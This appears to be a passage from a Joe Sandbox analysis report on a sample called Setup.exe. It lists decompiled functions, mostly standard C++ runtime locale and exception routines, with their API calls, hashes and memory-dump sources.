                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: c621e073f57260eee7bbdf6bbcedb6d104d28f1f349a6f107e87a459e63dea86
                                                                                                                                                                                                                                                      • Instruction ID: 0db1745b48c31eca82cd8771b6bbf728af0dc0f90609f4adb6b00c9ca6eda158
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c621e073f57260eee7bbdf6bbcedb6d104d28f1f349a6f107e87a459e63dea86
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8101803A900A199BCB05EFACD814ABEBBB6AF4C721F284049D4116F291DF359A45CB91
                                                                                                                                                                                                                                                      Function 031AFA46 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFA4D
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFA57
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AFA91
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFAA8
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFAC8
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFAD5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: 1396e4e5264accdae0d2b0a0013e974cb1d6b8a2cd53651eb8a1cedb25667b97
                                                                                                                                                                                                                                                      • Instruction ID: 240d7a440e69786eb6230d0115a39c8947230d8c0b8b846eefea84dd8837d973
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1396e4e5264accdae0d2b0a0013e974cb1d6b8a2cd53651eb8a1cedb25667b97
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE01C439900B1A9FCB05EBA8D8046BE7776AF4CB11F180009D4116F2D0DF349A46C790
                                                                                                                                                                                                                                                      Function 031AFADB Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFAE2
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFAEC
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AFB26
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFB3D
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFB5D
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFB6A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: 3039b798d95127d44cb803473528154f58e28e09f5846736216449151fc26cae
                                                                                                                                                                                                                                                      • Instruction ID: 6defd9e8ece03656c2bdae19f92c866ecf5fadb326fd262fb4ad8db1a9454355
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3039b798d95127d44cb803473528154f58e28e09f5846736216449151fc26cae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A0184399007199FCB05EBA8DC54ABE77B6BF4C711F184009E4126F2D1DF349A45CB91
                                                                                                                                                                                                                                                      Function 031AF9B1 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF9B8
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF9C2
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AF9FC
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFA13
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFA33
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFA40
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: 2e2fa559c46844fac7c83c4b18d24d164f0be98e59828855ddde3987a14fbef1
                                                                                                                                                                                                                                                      • Instruction ID: a543bf84a24d33b1022c7f628f5e8536cf5280d3e9a183f82c924423d483b0d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2fa559c46844fac7c83c4b18d24d164f0be98e59828855ddde3987a14fbef1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C101D23D900B19ABCB04EBA8D804ABE7BB6AF8CB11F184108D4116F2D1DF749A46C790
                                                                                                                                                                                                                                                      Function 031AFE59 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFE60
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFE6A
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 031AFEA4
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFEBB
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFEDB
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFEE8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      • Opcode ID: f291f88efe8d8c7ee3e2866a0a1192c9c0d34b8241e1793f66723ee63771823d
                                                                                                                                                                                                                                                      • Instruction ID: c1a86a261016e5d4b8a605e9da42d0ccaa37b76049288d0d7acf1fc1c5c77694
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f291f88efe8d8c7ee3e2866a0a1192c9c0d34b8241e1793f66723ee63771823d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B01D63E900619AFCB05EBA8D804ABEBB76AF8C711F190409D811AF2D1DF349A45CB91
                                                                                                                                                                                                                                                      Function 02D612BF Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D612C6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D612D0
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6130A
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61321
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61341
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6134E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: e8fd516ca53c7942c66ab3fd9352789b9dfc00f6b8b5d342a3d06256c0c9aeda
                                                                                                                                                                                                                                                      • Instruction ID: 41e8f7876a02d06e1b18e44cd8d1dea6cf96cfb24389fcb3305b66c77fb8d67b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8fd516ca53c7942c66ab3fd9352789b9dfc00f6b8b5d342a3d06256c0c9aeda
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB01C0319002698BCF05EB64C9586BDB7A6EF94310F28412AE85A67390DF74DE05CFA9
                                                                                                                                                                                                                                                      Function 02D6122A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61231
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6123B
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D61275
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6128C
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D612AC
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D612B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: 69accdf9a348cfa7df098235a5e72701dded504d52d50a77557dd09122a7f64d
                                                                                                                                                                                                                                                      • Instruction ID: 5a1af335a5ac8841b7e41db9e67b71abb10cb1b63969331ce3cdd7ee21554534
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69accdf9a348cfa7df098235a5e72701dded504d52d50a77557dd09122a7f64d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D0100319001299FCF04EBA4C9086BDB7AAEF88310F24411AE809A7390CF74DE05CFA9
                                                                                                                                                                                                                                                      Function 02D61354 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6135B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61365
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6139F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D613B6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D613D6
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D613E3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: 96a722ef78b31369ee55bd3ccfb9f27fffd39944d2911880095fa3572dcbfa57
                                                                                                                                                                                                                                                      • Instruction ID: 45c3b1d90a23a06b7fefb7bd44c0a701bf635f0f465b51596f12ff67edc5d7c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96a722ef78b31369ee55bd3ccfb9f27fffd39944d2911880095fa3572dcbfa57
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 410100319002298BCF05EBA4C9446BEBBB6EF84310F28445AE84967390CFB5DE05CFA5
                                                                                                                                                                                                                                                      Function 02D6163D Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61644
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6164E
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 02D61688
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6169F
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D616BF
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D616CC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      • Opcode ID: ae7962d973eb96154aa224717107d16c7ae73739b57ff5cccb206d995a53061f
                                                                                                                                                                                                                                                      • Instruction ID: 1694e261f3c54767cf0d81a8b628385b0030b7cde39aaa3d9226566d7a7ac314
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae7962d973eb96154aa224717107d16c7ae73739b57ff5cccb206d995a53061f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B001ED759001658BCF04EBA4C9086BEBBB6EF94310F28411AE81967390CF75DE01CFA5
                                                                                                                                                                                                                                                      Function 02D6CB06 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CB0D
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CB17
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 02D6CB51
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CB68
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CB88
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CB95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 958335874-0
                                                                                                                                                                                                                                                      • Opcode ID: 3b023bc84f7f1bab804e7ef3c50303b96b90a4c28830213ffb59d465bd7f2053
                                                                                                                                                                                                                                                      • Instruction ID: 34e766291b69fdf60125e5346a7f42c84de9edc17798c2bd155c784dab1cf844
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b023bc84f7f1bab804e7ef3c50303b96b90a4c28830213ffb59d465bd7f2053
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B01C03191012A8BCF05EBA8C9586FDB7A6EF94324F24451AE815AB390CF749E05CFA5
                                                                                                                                                                                                                                                      Function 02D6CCC5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CCCC
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CCD6
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6CD10
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CD27
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CD47
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CD54
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: c3066c0aceaebd5e1d8a464e8774f452b4981e6528b835b4ea4bdb287f5a9c74
                                                                                                                                                                                                                                                      • Instruction ID: 51cdc12e28d480758039a66e50fd3ae482c94d4d722bf51d0c27306cb86268e9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3066c0aceaebd5e1d8a464e8774f452b4981e6528b835b4ea4bdb287f5a9c74
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE0100319001258BCF04EBA8C9486FEBBB6EF84320F24401AE8146B390CF749E01CFA5
                                                                                                                                                                                                                                                      Function 02D6CD5A Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CD61
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CD6B
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6CDA5
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CDBC
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CDDC
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CDE9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      • Opcode ID: 23ddec356488aa7d80e561ef1a5de9efe688d141ee9816f6cdaef3e517060c40
                                                                                                                                                                                                                                                      • Instruction ID: 510d352250048284ca323fc3e2a96deff6621b4d3da4bc1cb9a8981f179dccc7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23ddec356488aa7d80e561ef1a5de9efe688d141ee9816f6cdaef3e517060c40
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E0100359001258BCF04EBA4C9186BEBBA2EF98310F24401AE815AB390CF759E05CFA5
                                                                                                                                                                                                                                                      Function 02D3DD74 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3DF43
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3DF5D
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3E18A
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3E1A4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                      • String ID: @PIT6I
                                                                                                                                                                                                                                                      • API String ID: 4194217158-2369559966
                                                                                                                                                                                                                                                      • Opcode ID: 9f7c992e4e2b24ed6ebda69c4371158491d9d75bec92deded6937c5c3cbb62ef
                                                                                                                                                                                                                                                      • Instruction ID: 82e1a39592442fdba65a3945630a227918d0e2d1b405a92e9e5626c2534601e9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7c992e4e2b24ed6ebda69c4371158491d9d75bec92deded6937c5c3cbb62ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76E12370D05298DEDB21DB64C854BDEBBB5AF19300F1481DAD448A7381EB746F88DFA2
                                                                                                                                                                                                                                                      Function 031CFEAD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\Desktop\Setup.exe, xrefs: 031CFEC9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                      • API String ID: 0-2320538190
                                                                                                                                                                                                                                                      • Opcode ID: 385e246292c4f623cb00b58a88d844869eb76e620b2ef458b208762659fb2141
                                                                                                                                                                                                                                                      • Instruction ID: 96defcbd55e4bb2e5ae10681877db0453e166d288fc0991b25dafbba3326725d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 385e246292c4f623cb00b58a88d844869eb76e620b2ef458b208762659fb2141
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B21FF76224385AFCB14EF71985092B77AEEF2E260B05455DF915CB140DB30EC4287A0
                                                                                                                                                                                                                                                      Function 031B33B4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
